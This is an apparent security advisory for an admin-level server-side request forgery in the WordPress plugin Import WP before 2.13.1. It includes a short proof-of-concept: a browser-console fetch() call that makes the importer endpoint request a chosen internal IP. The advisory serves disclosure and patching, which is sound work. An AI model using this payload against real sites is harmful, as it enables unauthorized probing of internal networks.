Import WP < 2.13.1 - Admin+ Server-side Request Forgery

Description The plugin does not prevent users with the administrator role from pinging conducting SSRF attacks, which may be a problem in multisite configurations.

PoC

1. As an admin, create a new importer in /wp-admin/tools.php?page=importwp 2. Visit /wp-admin/admin-ajax.php?action=rest-nonce and paste the following in your browser’s console, replace $IMPORTERID with the newly created importer’s ID, and $TARGETLOCALIP with the local IP to probe: fetch(‘/wp-json/iwp/v1/importer/$IMPORTERID/upload’, { method: ‘POST’, headers: { ‘X-WP-Nonce’: document.body.innerHTML, ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body: ‘remote_url=http%3A%2F%2F$TARGETLOCALIP%2FSSRF_PoC&filetype;=csv&action;=file_remote’, credentials: ‘include’ }) .then(response => response.text()) .then(data => console.log(data)) .catch(error => console.error(‘Fetch error:’, error));